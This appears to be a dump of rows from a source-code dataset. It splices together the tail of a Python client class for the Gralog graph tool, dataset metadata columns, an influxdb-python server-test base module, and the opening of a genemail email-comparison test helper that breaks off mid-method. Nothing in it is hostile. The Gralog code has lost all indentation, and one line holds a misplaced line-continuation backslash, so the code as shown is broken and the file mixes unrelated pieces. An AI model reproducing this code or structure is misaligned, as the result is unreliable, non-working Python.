line = "getEdgeIdByEndpoints#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(endpoints)
print(line.rstrip())
sys.stdout.flush()
edgeId = sys.stdin.readline().rstrip()
return edgeId
def getVertex(self, vertex):
line = "getVertex#"+str(self.id).rstrip() + "#"
line = line + str(vertex).rstrip()
print (line.rstrip())
sys.stdout.flush()
vertexTuple = sys.stdin.readline().rstrip()
vertex.sourceProperties(vertexTuple)
return vertex
def getEdge(self, edge):
line = "getEdge#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(edge)
print (line.rstrip())
sys.stdout.flush()
edgeTuple = sys.stdin.readline().rstrip()
edge.sourceProperties(edgeTuple)
return edge
# end helper functions
# Graph Manipulating Functions
def addVertex(self, vertexId=-1, pos=(None, None)):
# return: Vertex object with id
line = "addVertex#" + str(self.id).rstrip()
x = -1
y = -1
vertexIdSwap = False
if type(vertexId) == tuple and pos == (None, None):
x = vertexId[0]
y = vertexId[1]
vertexId = -1
else:
x = pos[0]
y = pos[1]
if vertexId != -1:
line += "#"+str(vertexId).rstrip()
if x != None and y != None:
line += "#" + str(x).rstrip() + "#" + str(y).rstrip()
print(line)
sys.stdout.flush()
vid = sys.stdin.readline()
v = Vertex(self, vid)
self.id_to_vertex[v.getId()] = v
return v
def deleteVertex(self, v):
edges = self.getIncidentEdges(v)
for e in edges:
del self.id_to_edge[e.getId()]
v = vertexId(v)
del self.id_to_vertex[v]
print("deleteVertex#" + str(self.id).rstrip() + "#" + str(v))
sys.stdout.flush()
def addEdge(self, sourceVertex, targetVertex, edgeId = -1):
# return: Edge object with id only
sourceVertex = vertexId(sourceVertex)
targetVertex = vertexId(targetVertex)
idSubString = ""
if not edgeId == -1:
idSubString = "#"+str(edgeId)
line = "addEdge#"+str(self.id).rstrip() + "#" + str(sourceVertex).rstrip() + \
"#" + str(targetVertex).rstrip() + idSubString.rstrip()
print(line.rstrip())
sys.stdout.flush()
eid = sys.stdin.readline()
if eid != "\n": # it's possible that the edge cannot be added (e.g., a new selfloop)
e = Edge(self, eid)
self.id_to_edge[e.getId()] = e
return e
return None
def existsEdge(self, edge):
line = "existsEdge#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(edge)
print(line.rstrip())
sys.stdout.flush()
thereExistsAnEdge = sys.stdin.readline().rstrip()
return thereExistsAnEdge.lower() == "true"
def existsVertex(self, vertex):
line = "existsVertex#"+str(self.id).rstrip() + "#"
line = line + str(vertex).rstrip()
print(line.rstrip())
sys.stdout.flush()
thereExistsAVertex = sys.stdin.readline().rstrip()
return thereExistsAVertex.lower() == "true"
def deleteEdge(self, edge):
del self.id_to_edge[edge.getId()]
line = "deleteEdge#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(edge)
print(line.rstrip())
sys.stdout.flush()
def getAllEdgesBetween(self, vertexPair):
line = "getAllEdgesBetween#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(vertexPair)
print(line.rstrip())
sys.stdout.flush()
endpointList = sys.stdin.readline()
endpointList = endpointList.split("#")
edges = []
for i in range(len(endpointList)):
term = endpointList[i].rstrip()
term = term[1:-1]
e = self.termToEdge(term)
if e != None:
edges.append(e)
return edges
# creates a random Erdos-Reny graph with n id_to_vertex and edge probability p
def generateRandomGraph(self, vertexCount, p):
if not isinstance(vertexCount, int):
gPrint("Cannot generate a random graph, wrong parameter: \
vertex number must be an int.")
if vertexCount < 0:
gPrint("Cannot generate a random graph, wrong parameter: \
vertex number cannot be less than 0.")
if not isinstance(p, float) or p < 0 or p > 1.0:
gPrint("Cannot generate a random graph, wrong parameter: \
probability of an edge must be a float in [0,1].")
if vertexCount == 0:
return
vertices = []
coordinates = dict()
for id in range(vertexCount):
coordinates[id] = (10*math.cos(2*id*math.pi/vertexCount),
10*math.sin(2*id*math.pi/vertexCount))
nxgraph = nx.fast_gnp_random_graph(vertexCount, p)
d = dict()
id = 0
for nxV in nxgraph.nodes():
d[id] = nxV
id += 1
nxEdges = nxgraph.edges()
id = 0
for x in range(vertexCount):
vertices.append(self.addVertex(id, coordinates[id]))
id += 1
for x in vertices:
for y in vertices:
if x.getId() < y.getId():
if (d[x.getId()], d[y.getId()]) in nxEdges:
x.connect(y)
# end manilupative functions
# setter functions
# begin: best for private use!
def setVertexFillColor(self, vertex, colorHex=-1, colorRGB=-1):
vertex = vertexId(vertex)
line = "setVertexFillColor#" + str(self.id).rstrip() + "#" + str(vertex).rstrip() + "#"
if not (colorHex == -1):
line = line + hexFormatter(str(colorHex))
elif not (colorRGB == -1):
try:
line = line + rgbFormatter(colorRGB)
except:
self.sendErrorToGralog("the rgb color: " + str(colorRGB).rstrip() + " is not properly formatted!")
else:
self.sendErrorToGralog("neither Hex nor RGB color specified!")
print(line.rstrip())
sys.stdout.flush()
def setVertexStrokeColor(self, vertex, colorHex=-1, colorRGB=-1):
vertex = vertexId(vertex)
# print("colorhex: " + str(colorHex))
line = "setVertexStrokeColor#"+str(self.id).rstrip() + "#" + str(vertex).rstrip() + "#"
if not (colorHex == -1):
line = line + hexFormatter(str(colorHex))
elif not (colorRGB == -1) and len(colorRGB) == 3:
line = line + rgbFormatter(colorRGB)
print(line.rstrip())
sys.stdout.flush()
def setVertexCoordinates(self, vertex, coordinates):
line = "setVertexCoordinates#" + str(self.id).rstrip()+"#" + str(vertexId(vertex)).rstrip()
x = -1
y = -1
x = coordinates[0]
y = coordinates[1]
if x == None:
x = "empty"
if y == None:
y = "empty"
line += "#" + str(x).rstrip() + "#" + str(y).rstrip()
print(line)
sys.stdout.flush()
def setEdgeContour(self, edge, contour):
line = line = "setEdgeContour#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(edge)
line = line + "#" + str(contour).rstrip()
print(line)
sys.stdout.flush()
def setEdgeColor(self, edge, colorHex=-1, colorRGB=-1):
line = "setEdgeColor#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(edge)
line = line + "#"
if not (colorHex == -1):
line = line + hexFormatter(colorHex)
elif not (colorRGB == -1) and len(colorRGB) == 3:
line = line + rgbFormatter(colorRGB)
print(line.rstrip())
sys.stdout.flush()
def setVertexRadius(self, vertex, newRadius):
self.setVertexDimension(vertex, newRadius, "radius")
def setVertexHeight(self, vertex, newHeight):
self.setVertexDimension(vertex, newHeight, "height")
def setVertexWidth(self, vertex, newWidth):
self.setVertexDimension(vertex, newWidth, "width")
def setVertexDimension(self, vertex, newDimension, dimension):
vertex = vertexId(vertex)
line = "setVertexDimension#"+str(self.id).rstrip() + "#" + str(vertex).rstrip() + "#" + str(newDimension).rstrip()+"#" + dimension.rstrip()
print(line.rstrip())
sys.stdout.flush()
def setVertexShape(self, vertex, shape):
vertex = vertexId(vertex)
line = "setVertexShape#" + str(self.id).rstrip() + "#" + str(vertex).rstrip() + "#" + str(shape).rstrip()
print(line.rstrip())
sys.stdout.flush()
def setEdgeWeight(self, edge, weight):
self.setEdgeProperty(edge, "weight", weight)
def setEdgeThickness(self, edge, thickness):
self.setEdgeProperty(edge, "thickness", thickness)
def setEdgeProperty(self, edge, propertyName, value):
line = "setEdgeProperty#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(edge)
line = line + "#" + propertyName.rstrip().lower() + "#" + str(value).rstrip().lower()
print(line.rstrip())
sys.stdout.flush()
def setVertexProperty(self, vertex, propertyName, value):
line = "setVertexProperty#"+str(self.id).rstrip() + "#"
line = line + str(vertexId(vertex)).rstrip()
line = line + "#" + propertyName.rstrip().lower() + "#" + str(value).rstrip().lower()
print(line.rstrip())
sys.stdout.flush()
def setEdgeLabel(self, edge, label):
line = "setEdgeLabel#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(edge)
line = line + "#" + label
print(line.rstrip())
sys.stdout.flush()
def setVertexLabel(self, vertex, label):
vertex = vertexId(vertex)
line = "setVertexLabel#" + str(self.id).rstrip() + "#" + str(vertex).rstrip() + "#" + label
print(line.rstrip())
sys.stdout.flush()
# end: best for private use!
def setGraph(self, graphFormat, graphString = "hello_world"):
graphFormat = graphFormat.lower()
line = "setGraph#"+str(self.id).rstrip() + "#" + graphFormat.rstrip()+"#"
if graphFormat == "gtgf" or graphFormat == "tgf":
line += "$$\n"
line += graphString
if graphFormat == "gtgf" or graphFormat == "tgf":
line += "$\n"
print(line)
sys.stdout.flush()
# TODO: implement this
# end setter functions
# getter functions
def toIgraph(self):
grlgML_file = open("tmp.graphml", "w")
grlgML_file.write(self.toXml())
grlgML_file.close()
g_ig = ig.Graph.Read_GraphML("tmp.graphml")
os.remove("tmp.graphml")
return g_ig
def toNx(self):
grlgML_file = open("tmp.graphml", "w")
grlgML_file.write(self.toXml())
grlgML_file.close()
g_nx = nx.read_graphml("tmp.graphml")
os.remove("tmp.graphml")
return g_nx
def toElementTree(self):
grlgML_file = open("tmp.graphml", "w")
grlgML_file.write(self.toXml())
grlgML_file.close()
g_ET = ET.parse("tmp.graphml")
os.remove("tmp.graphml")
return g_ET
def toXml(self):
return self.getGraph("xml")
def getGraph(self, graphFormat):
# warning!! importing as pure TGF will mean edge id's will
# be lost. This will result in errors on the Gralog side.
line = "getGraph#"+str(self.id).rstrip() + "#" + graphFormat.rstrip()
print(line.rstrip())
i = 0
sys.stdout.flush()
line = sys.stdin.readline()
graphString = ""
if graphFormat.lower() == "tgf" or graphFormat.lower() == "gtgf":
tgf = graphFormat.lower() == "tgf"
multiline = False
first = False
if line[0] == line[1] == '$':
multiline = True
if tgf:
first = True
line = sys.stdin.readline()
hashtagSeen = False
if not multiline:
return graphString
while line[0] != '$':
# gPrint("line: " + line +" and line[0]: " + line[0] + " and line[0]!='$': " + str(line[0] != '$'))
graphString += line
if line[0] == '#':
hashtagSeen = True
else:
if not first:
if hashtagSeen:
if tgf:
self.edgifyTGFCommand(line)
else:
self.edgifyGTGFCommand(line)
else:
if tgf:
self.vertexifyTGFCommand(line)
else:
self.vertexifyGTGFCommand(line)
line = sys.stdin.readline()
i += 1
first = False
return graphString
if graphFormat.lower() == "xml":
return line
def getAllVertices(self):
# return: list of Vertex objects with id
line = "getAllVertices#"+str(self.id).rstrip()
print(line.rstrip())
sys.stdout.flush()
vertexIdStringList = (sys.stdin.readline()).split("#")
vertexList = []
for vertexIdString in vertexIdStringList:
if representsInt(vertexIdString):
v = self.getVertexOrNew(vertexIdString)
vertexList.append(v)
return vertexList
def getVertices(self):
return(self.getAllVertices())
def getAllEdges(self):
# return: list of fully sourced Edge objects with fully sourced endpoint Vertices
line = "getAllEdges#"+str(self.id).rstrip()
print(line.rstrip())
sys.stdout.flush()
endpointList = sys.stdin.readline()
endpointList = endpointList.split("#")
edges = []
if len(endpointList) == 1 and endpointList[-1] == "\n":
endpointList = []
for i in range(len(endpointList)):
term = endpointList[i].rstrip()
term = term[1:-1]
e = self.termToEdge(term)
if e != None:
edges.append(e)
return edges
def getEdges(self):
return(self.getAllEdges())
# start: best for private use!
def getNeighbours(self, vertex):
# return: list of Vertex objects with id
vertex = vertexId(vertex)
line = "getNeighbours#" + str(self.id).rstrip() + "#" + str(vertex).rstrip()
print(line.rstrip())
sys.stdout.flush()
neighbourIdStringList = (sys.stdin.readline()).split("#")
neighboursList = []
for neighbourIdString in neighbourIdStringList:
if representsInt(neighbourIdString):
v = self.getVertexOrNew(neighbourIdString)
neighboursList.append(v)
return neighboursList
def getOutgoingNeighbours(self, vertex):
# return: list of Vertex objects with id
vertex = vertexId(vertex)
line = "getOutgoingNeighbours#" + str(self.id).rstrip() + "#" + str(vertex).rstrip()
print(line.rstrip())
sys.stdout.flush()
outgoingNeighbourIdStringList = (sys.stdin.readline()).split("#")
outgoingNeighboursList = []
for outgoingNeighbourIdString in outgoingNeighbourIdStringList:
if representsInt(outgoingNeighbourIdString):
v = self.getVertexOrNew(outgoingNeighbourIdString)
outgoingNeighboursList.append(v)
return outgoingNeighboursList
def getIncomingNeighbours(self, vertex):
# return: list of Vertex objects with id
vertex = vertexId(vertex)
line = "getIncomingNeighbours#"+str(self.id).rstrip() + "#" + str(vertex).rstrip()
print(line.rstrip())
sys.stdout.flush()
incomingNeighbourIdStringList = (sys.stdin.readline()).split("#")
incomingNeighboursList = []
for incomingNeighbourIdString in incomingNeighbourIdStringList:
if representsInt(incomingNeighbourIdString):
v = self.getVertexOrNew(incomingNeighbourIdString)
incomingNeighboursList.append(v)
return incomingNeighboursList
def getIncidentEdges(self, vertex):
# return: list of Edge objects with id's only
vertex = vertexId(vertex)
line = "getIncidentEdges#" + str(self.id).rstrip() + "#" + str(vertex).rstrip()
print(line.rstrip())
sys.stdout.flush()
endpointList = sys.stdin.readline()
endpointList = endpointList.split("#")
edges = []
for i in range(len(endpointList)):
term = endpointList[i].rstrip()
term = term[1:-1]
e = self.termToEdge(term)
if e != None:
edges.append(e)
return edges
def getAdjacentEdges(self, edge):
# return: list of Edge objects with id's only
line = "getAdjacentEdges#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(edge)
print(line.rstrip())
sys.stdout.flush()
endpointList = sys.stdin.readline()
endpointList = endpointList.split("#")
edges = []
for i in range(len(endpointList)):
term = endpointList[i].rstrip()
term = term[1:-1]
e = self.termToEdge(term)
if e != None:
edges.append(e)
return edges
def getOutgoingEdges(self, vertex):
# return: list of Edge objects with id's only
vertex = vertexId(vertex)
line = "getOutgoingEdges#" + str(self.id).rstrip() + "#" + str(vertex).rstrip()
print(line.rstrip())
sys.stdout.flush()
endpointList = sys.stdin.readline()
endpointList = endpointList.split("#")
edges = []
for i in range(len(endpointList)):
term = endpointList[i].rstrip()
term = term[1:-1]
e = self.termToEdge(term)
if e != None:
edges.append(e)
return edges
def getIncomingEdges(self, vertex):
# return: list of Edge objects with id's only
vertex = vertexId(vertex)
line = "getIncomingEdges#" + str(self.id).rstrip() + "#" + str(vertex).rstrip()
print(line.rstrip())
sys.stdout.flush()
endpointList = sys.stdin.readline()
endpointList = endpointList.split("#")
edges = []
for i in range(len(endpointList)):
term = endpointList[i].rstrip()
term = term[1:-1]
e = self.termToEdge(term)
if e != None:
edges.append(e)
return edges
def getEdgeWeight(self, edge):
return self.getEdgeProperty(edge, "weight")
def getEdgeLabel(self, edge):
return self.getEdgeProperty(edge, "label")
def getEdgeProperty(self, edge, prop):
# internally: fill edge property dictionary
# return: String representing queried property
line = "getEdgeProperty#"+str(self.id).rstrip() + "#"
line = line + edgeSplitter(edge)
line = line + "#" + prop.rstrip().lower()
print(line.rstrip())
sys.stdout.flush()
edgeTuple = sys.stdin.readline().rstrip()
edge.sourceProperties(edgeTuple)
return edge.getProperty(prop)
def getVertexProperty(self, vertex, prop):
# internally: fill edge property dictionary
# return: String representing queried property
vid = vertexId(vertex)
line = "getVertexProperty#"+str(self.id).rstrip() + "#"
line = line + vid
line = line + "#" + prop.rstrip().lower()
print(line.rstrip())
sys.stdout.flush()
vertexTuple = sys.stdin.readline().rstrip()
vertex.sourceProperties(vertexTuple)
return vertex.getProperty(prop)
# end: best use privately!
def requestVertex(self):
line = "requestVertex#"+str(self.id).rstrip()
print(line.rstrip())
sys.stdout.flush()
vid = sys.stdin.readline().rstrip()
vertex = self.getVertexOrNew(vid)
return vertex
def requestRandomVertex(self):
line = "requestRandomVertex#"+str(self.id).rstrip()
print(line.rstrip())
sys.stdout.flush()
vid = sys.stdin.readline().rstrip()
vertex = self.getVertexOrNew(vid)
return vertex
def requestEdge(self):
line = "requestEdge#"+str(self.id).rstrip()
print(line.rstrip())
sys.stdout.flush()
vid = sys.stdin.readline().rstrip()
edge = self.getEdgeOrNew(vid)
return edge
def requestRandomEdge(self):
line = "requestRandomEdge#"+str(self.id).rstrip()
print(line.rstrip())
sys.stdout.flush()
eid = sys.stdin.readline().rstrip()
edge = self.getEdgeOrNew(eid)
return edge
def requestInteger(self):
line = "requestInteger#"+str(self.id).rstrip()
print(line.rstrip())
sys.stdout.flush()
i = sys.stdin.readline().rstrip()
return int(i)
def requestFloat(self):
line = "requestFloat#"+str(self.id).rstrip()
print(line.rstrip())
sys.stdout.flush()
d = sys.stdin.readline().rstrip()
return float(d)
def requestString(self):
line = "requestString#"+str(self.id).rstrip()
print(line.rstrip())
sys.stdout.flush()
st = sys.stdin.readline().rstrip()
return str(st)
# runtime changer functions
def pauseUntilSpacePressed(self, *args):
line = "pauseUntilSpacePressed"
rank = None
try:
rank = int(args[0])
except:
pass
if len(args) > 0 and rank != None:
rank = int(args[0])
args = args[1:]
argString = ""
if rank != None:
argString += "#"+str(rank).rstrip()
for key in sorted(self.variablesToTrack.keys()):
term = "#("+str(key).rstrip()+"=" + \ str(self.variablesToTrack[key]).rstrip()+")"
argString = argString + term.rstrip()
for x in args:
if len(x) != 2:
argString = "#(syntax=pauseUntilSpacePressed((key, val)))"
break
if (type(x) == list):
for each in x:
term = "#("+"arrayyyy"+str(each[0])+"="+str(each[1])+")"
argString = argString + term
else:
term = "#("+str(x[0])+"="+str(x[1])+")"
argString = argString + term.rstrip()
line = line + argString
print(line)
sys.stdout.flush()
toSkip = sys.stdin.readline()
def track(self, name, var):
# ideally, something like this:
self.variablesToTrack[name] = var # if this is a pointer, it will work
# if it is an int or str, or some other non-reference type, it will not
def unTrack(self, name):
del self.variablesToTrack[name]
def sendMessage(self, toSend):
print(toSend)
sys.stdout.flush()
def message(self, message):
print("message#"+str(self.id).rstrip() + "#"+str(message).rstrip())
sys.stdout.flush()
def sendErrorToGralog(self, toSend):
print("error#"+str(self.id).rstrip() + "#"+str(toSend).rstrip())
sys.stdout.flush()
exit()
def mistakeLine(self):
print("wubbadubdub 3 men in a tub")
sys.stdout.flush()
sys.stdin.readline()
def pause(self, *args):
self.pauseUntilSpacePressed(*args)
# end runtime changer functions
def __str__(self):
vertices = [str(v) for v in self.id_to_vertex]
vertices.sort()
edges = [str(e) for e in self.getEdges()]
edges.sort()
return "VERTICES: " + " ".join(vertices) + "\nEDGES: " + " ".join(edges)
def gPrint(message):
if not message: # empty: print nothing except the new line (hacked with \t; <space> doesn't work)
print("gPrint#-1#" + "\t")
sys.stdout.flush()
else:
message = str(message)
lines = message.split('\n')
for line in lines:
print("gPrint#-1#" + line)
sys.stdout.flush()
def representsInt(s):
try:
int(s)
return True
except ValueError:
return False
| en | 0.239242 | #!/usr/bin/env python3 #-1#" + "netwrokx not installed for " + sys.executable) #-1#" + "igraph not installed for " + sys.executable) # debugging = False # what if i want to get a vertex? should i also get all its neighbours? how about incident edges? This is all v aufw\"andig and leads to the paradigm by which we just store the grpah in python??? # private methods #if -2, then imported without id like in TGF # don't use!! # public methods # edge as defined by start, end nodes # edge is given by id #edge has type Edge # perform analysis of graph # we want a new graph # helper functions #"+str(self.id).rstrip() + "#" #"+str(self.id).rstrip() + "#" #"+str(self.id).rstrip() + "#" # end helper functions # Graph Manipulating Functions # return: Vertex object with id #" + str(self.id).rstrip() #" + str(self.id).rstrip() + "#" + str(v)) # return: Edge object with id only #"+str(self.id).rstrip() + "#" + str(sourceVertex).rstrip() + \ # it's possible that the edge cannot be added (e.g., a new selfloop) #"+str(self.id).rstrip() + "#" #"+str(self.id).rstrip() + "#" #"+str(self.id).rstrip() + "#" #"+str(self.id).rstrip() + "#" # creates a random Erdos-Reny graph with n id_to_vertex and edge probability p # end manilupative functions # setter functions # begin: best for private use! #" + str(self.id).rstrip() + "#" + str(vertex).rstrip() + "#" # print("colorhex: " + str(colorHex)) #"+str(self.id).rstrip() + "#" + str(vertex).rstrip() + "#" #" + str(self.id).rstrip()+"#" + str(vertexId(vertex)).rstrip() #"+str(self.id).rstrip() + "#" #"+str(self.id).rstrip() + "#" #"+str(self.id).rstrip() + "#" + str(vertex).rstrip() + "#" + str(newDimension).rstrip()+"#" + dimension.rstrip() #" + str(self.id).rstrip() + "#" + str(vertex).rstrip() + "#" + str(shape).rstrip() #"+str(self.id).rstrip() + "#" #"+str(self.id).rstrip() + "#" #"+str(self.id).rstrip() + "#" #" + str(self.id).rstrip() + "#" + str(vertex).rstrip() + "#" + label # end: best for private use! #"+str(self.id).rstrip() + "#" + graphFormat.rstrip()+"#" # TODO: implement this # end setter functions # getter functions # warning!! importing as pure TGF will mean edge id's will # be lost. This will result in errors on the Gralog side. #"+str(self.id).rstrip() + "#" + graphFormat.rstrip() # gPrint("line: " + line +" and line[0]: " + line[0] + " and line[0]!='$': " + str(line[0] != '$')) # return: list of Vertex objects with id #"+str(self.id).rstrip() # return: list of fully sourced Edge objects with fully sourced endpoint Vertices #"+str(self.id).rstrip() # start: best for private use! # return: list of Vertex objects with id #" + str(self.id).rstrip() + "#" + str(vertex).rstrip() # return: list of Vertex objects with id #" + str(self.id).rstrip() + "#" + str(vertex).rstrip() # return: list of Vertex objects with id #"+str(self.id).rstrip() + "#" + str(vertex).rstrip() # return: list of Edge objects with id's only #" + str(self.id).rstrip() + "#" + str(vertex).rstrip() # return: list of Edge objects with id's only #"+str(self.id).rstrip() + "#" # return: list of Edge objects with id's only #" + str(self.id).rstrip() + "#" + str(vertex).rstrip() # return: list of Edge objects with id's only #" + str(self.id).rstrip() + "#" + str(vertex).rstrip() # internally: fill edge property dictionary # return: String representing queried property #"+str(self.id).rstrip() + "#" # internally: fill edge property dictionary # return: String representing queried property #"+str(self.id).rstrip() + "#" # end: best use privately! #"+str(self.id).rstrip() #"+str(self.id).rstrip() #"+str(self.id).rstrip() #"+str(self.id).rstrip() #"+str(self.id).rstrip() #"+str(self.id).rstrip() #"+str(self.id).rstrip() # runtime changer functions # ideally, something like this: # if this is a pointer, it will work # if it is an int or str, or some other non-reference type, it will not #"+str(self.id).rstrip() + "#"+str(message).rstrip()) #"+str(self.id).rstrip() + "#"+str(toSend).rstrip()) # end runtime changer functions # empty: print nothing except the new line (hacked with \t; <space> doesn't work) #-1#" + "\t") #-1#" + line) | 2.135334 | 2 |
influxdb/tests/server_tests/base.py | ocworld/influxdb-python | 2 | 8006 | <gh_stars>1-10
# -*- coding: utf-8 -*-
"""Define the base module for server test."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import sys
from influxdb.tests import using_pypy
from influxdb.tests.server_tests.influxdb_instance import InfluxDbInstance
from influxdb.client import InfluxDBClient
if not using_pypy:
from influxdb.dataframe_client import DataFrameClient
def _setup_influxdb_server(inst):
inst.influxd_inst = InfluxDbInstance(
inst.influxdb_template_conf,
udp_enabled=getattr(inst, 'influxdb_udp_enabled', False),
)
inst.cli = InfluxDBClient('localhost',
inst.influxd_inst.http_port,
'root',
'',
database='db')
if not using_pypy:
inst.cliDF = DataFrameClient('localhost',
inst.influxd_inst.http_port,
'root',
'',
database='db')
def _teardown_influxdb_server(inst):
remove_tree = sys.exc_info() == (None, None, None)
inst.influxd_inst.close(remove_tree=remove_tree)
class SingleTestCaseWithServerMixin(object):
"""Define the single testcase with server mixin.
A mixin for unittest.TestCase to start an influxdb server instance
in a temporary directory **for each test function/case**
"""
# 'influxdb_template_conf' attribute must be set
# on the TestCase class or instance.
@classmethod
def setUp(cls):
"""Set up an instance of the SingleTestCaseWithServerMixin."""
_setup_influxdb_server(cls)
@classmethod
def tearDown(cls):
"""Tear down an instance of the SingleTestCaseWithServerMixin."""
_teardown_influxdb_server(cls)
class ManyTestCasesWithServerMixin(object):
"""Define the many testcase with server mixin.
Same as the SingleTestCaseWithServerMixin but this module creates
a single instance for the whole class. Also pre-creates a fresh
database: 'db'.
"""
# 'influxdb_template_conf' attribute must be set on the class itself !
@classmethod
def setUpClass(cls):
"""Set up an instance of the ManyTestCasesWithServerMixin."""
_setup_influxdb_server(cls)
def setUp(self):
"""Set up an instance of the ManyTestCasesWithServerMixin."""
self.cli.create_database('db')
@classmethod
def tearDownClass(cls):
"""Deconstruct an instance of ManyTestCasesWithServerMixin."""
_teardown_influxdb_server(cls)
def tearDown(self):
"""Deconstruct an instance of ManyTestCasesWithServerMixin."""
self.cli.drop_database('db')
| # -*- coding: utf-8 -*-
"""Define the base module for server test."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import sys
from influxdb.tests import using_pypy
from influxdb.tests.server_tests.influxdb_instance import InfluxDbInstance
from influxdb.client import InfluxDBClient
if not using_pypy:
from influxdb.dataframe_client import DataFrameClient
def _setup_influxdb_server(inst):
inst.influxd_inst = InfluxDbInstance(
inst.influxdb_template_conf,
udp_enabled=getattr(inst, 'influxdb_udp_enabled', False),
)
inst.cli = InfluxDBClient('localhost',
inst.influxd_inst.http_port,
'root',
'',
database='db')
if not using_pypy:
inst.cliDF = DataFrameClient('localhost',
inst.influxd_inst.http_port,
'root',
'',
database='db')
def _teardown_influxdb_server(inst):
remove_tree = sys.exc_info() == (None, None, None)
inst.influxd_inst.close(remove_tree=remove_tree)
class SingleTestCaseWithServerMixin(object):
"""Define the single testcase with server mixin.
A mixin for unittest.TestCase to start an influxdb server instance
in a temporary directory **for each test function/case**
"""
# 'influxdb_template_conf' attribute must be set
# on the TestCase class or instance.
@classmethod
def setUp(cls):
"""Set up an instance of the SingleTestCaseWithServerMixin."""
_setup_influxdb_server(cls)
@classmethod
def tearDown(cls):
"""Tear down an instance of the SingleTestCaseWithServerMixin."""
_teardown_influxdb_server(cls)
class ManyTestCasesWithServerMixin(object):
"""Define the many testcase with server mixin.
Same as the SingleTestCaseWithServerMixin but this module creates
a single instance for the whole class. Also pre-creates a fresh
database: 'db'.
"""
# 'influxdb_template_conf' attribute must be set on the class itself !
@classmethod
def setUpClass(cls):
"""Set up an instance of the ManyTestCasesWithServerMixin."""
_setup_influxdb_server(cls)
def setUp(self):
"""Set up an instance of the ManyTestCasesWithServerMixin."""
self.cli.create_database('db')
@classmethod
def tearDownClass(cls):
"""Deconstruct an instance of ManyTestCasesWithServerMixin."""
_teardown_influxdb_server(cls)
def tearDown(self):
"""Deconstruct an instance of ManyTestCasesWithServerMixin."""
self.cli.drop_database('db') | en | 0.620886 | # -*- coding: utf-8 -*- Define the base module for server test. Define the single testcase with server mixin. A mixin for unittest.TestCase to start an influxdb server instance in a temporary directory **for each test function/case** # 'influxdb_template_conf' attribute must be set # on the TestCase class or instance. Set up an instance of the SingleTestCaseWithServerMixin. Tear down an instance of the SingleTestCaseWithServerMixin. Define the many testcase with server mixin. Same as the SingleTestCaseWithServerMixin but this module creates a single instance for the whole class. Also pre-creates a fresh database: 'db'. # 'influxdb_template_conf' attribute must be set on the class itself ! Set up an instance of the ManyTestCasesWithServerMixin. Set up an instance of the ManyTestCasesWithServerMixin. Deconstruct an instance of ManyTestCasesWithServerMixin. Deconstruct an instance of ManyTestCasesWithServerMixin. | 2.071552 | 2 |
genemail/testing.py | cadithealth/genemail | 5 | 8007 | <reponame>cadithealth/genemail<filename>genemail/testing.py
# -*- coding: utf-8 -*-
#------------------------------------------------------------------------------
# file: $Id$
# auth: <NAME> <<EMAIL>>
# date: 2013/10/21
# copy: (C) Copyright 2013 Cadit Health Inc., All Rights Reserved.
#------------------------------------------------------------------------------
# todo: this could be smarter... for example, it could:
# - detect when references resolve to the same content, but
# by different Content-IDs
# - detect when multipart sections could collapse to the same
# semantic structure
from __future__ import absolute_import
import unittest, email
from .util import smtpHeaderFormat
#------------------------------------------------------------------------------
def canonicalHeaders(message, ignore=None):
'''
Returns a canonical string representation of the `message` headers,
with the following changes made:
* The MIME boundary specified in the "Content-Type" header, if
specified, removed.
* Any headers listed in `ignore` are removed.
:Parameters:
ignore : list(str), optional, default: ['Content-Transfer-Encoding']
List of headers that should not be included in the canonical
form.
'''
if ignore is None:
ignore = ['Content-Transfer-Encoding']
ignore = [key.lower() for key in ignore]
hdrs = {key.lower(): '; '.join(sorted(message.get_all(key)))
for key in message.keys()
if key.lower() not in ignore}
hdrs['content-type'] = '; '.join(['='.join(filter(None, pair))
for pair in message.get_params()
if pair[0].lower() != 'boundary'])
return '\n'.join([
smtpHeaderFormat(key) + ': ' + hdrs[key]
for key in sorted(hdrs.keys())]) + '\n'
#------------------------------------------------------------------------------
def canonicalStructure(message):
ret = message.get_content_type() + '\n'
if not message.is_multipart():
return ret
msgs = message.get_payload()
for idx, msg in enumerate(msgs):
last = idx + 1 >= len(msgs)
indent = '\n|-- ' if not last else '\n '
ret += '|-- ' if not last else '`-- '
ret += indent.join(canonicalStructure(msg)[:-1].split('\n')) + '\n'
return ret
#------------------------------------------------------------------------------
def makemsg(msg, submsg):
if msg is None:
return submsg
return msg + ' (' + submsg + ')'
#------------------------------------------------------------------------------
class EmailTestMixin(object):
mime_cmp_factories = {
'text/html' : lambda self, ct: self.try_assertXmlEqual,
'text/xml' : lambda self, ct: self.try_assertXmlEqual,
'text/*' : lambda self, ct: self.assertMultiLineEqual,
'*/*' : lambda self, ct: self.assertEqual,
}
#----------------------------------------------------------------------------
def registerMimeComparator(self, mimetype, comparator):
def factory(self, ct):
return comparator
self.mime_cmp_factories = dict(EmailTestMixin.mime_cmp_factories)
self.mime_cmp_factories[mimetype] = factory
#----------------------------------------------------------------------------
def _parseEmail(self, eml):
return email.message_from_string(eml)
#----------------------------------------------------------------------------
def assertEmailHeadersEqual(self, eml1, eml2, msg=None):
eml1 = self._parseEmail(eml1)
eml2 = self._parseEmail(eml2)
self._assertEmailHeadersEqual(eml1, eml2, msg=msg)
#----------------------------------------------------------------------------
def assertNotEmailHeadersEqual(self, eml1, eml2, msg=None):
try:
self.assertEmailHeadersEqual(eml1, eml2, msg=msg)
self.fail(msg or 'email headers %r == %r' % (eml1, eml2))
except AssertionError: pass
#----------------------------------------------------------------------------
def assertEmailStructureEqual(self, eml1, eml2, msg=None):
eml1 = self._parseEmail(eml1)
eml2 = self._parseEmail(eml2)
self._assertEmailStructureEqual(eml1, eml2, msg=msg)
#----------------------------------------------------------------------------
def assertNotEmailStructureEqual(self, eml1, eml2, msg=None):
try:
self.assertEmailStructureEqual(eml1, eml2, msg=msg)
